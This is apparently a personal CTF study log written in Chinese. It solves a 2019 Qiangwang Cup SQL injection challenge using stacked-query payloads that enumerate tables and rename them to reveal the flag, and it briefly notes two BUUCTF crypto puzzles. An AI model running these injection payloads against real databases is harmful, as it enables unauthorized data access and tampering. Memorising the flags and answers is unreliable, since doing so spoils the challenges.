22.1.21

喵喵喵喵喵喵，今天买了5900x！！有新的服务器用啦！

0x01 [强网杯 2019]随便注

1. 测试

   '1' or 1=1
   MariaDB server version for the right syntax to use near '1' or 1=1'' at line 
   都有显示。
   
       
       
       
   index.php?inject=' or '1'='1
   显示
   
   array(2) {
     [0]=>
     string(1) "1"
     [1]=>
     string(7) "hahahah"
   }
   
   array(2) {
     [0]=>
     string(1) "2"
     [1]=>
     string(12) "miaomiaomiao"
   }
   
   array(2) {
     [0]=>
     string(6) "114514"
     [1]=>
     string(2) "ys"
   }

   2. 其实这里是看了WP的

   ';show tables;
   
   查看words
   ';show columns from words;
   查看另外一个
   ';show columns from `1919810931114514`;
   
   看到了flag
   
   但是好像是不能查询的
   
   下这是一个payload，不是我写的。
   1';alter table `1919810931114514` add(id int NULL);rename table `words` to `xiaohua`;rename table `1919810931114514` to `words`;
   
   直接把库名给重命名换过来。
   '1'='1
   
    string(42) "flag{52e30ed9-fd07-4aef-a28d-27d4d4eaf871}"
    
    

0x02 buu crypto 信息化时代的步伐

6060计 4615算 2623机 6008要 1783从 1216娃 1216娃 2119抓 6386起

0x03 buu crypto 萌萌哒的八戒

1. 猪圈密码。
2. 慢慢点可以得到whenthepigwanttoeat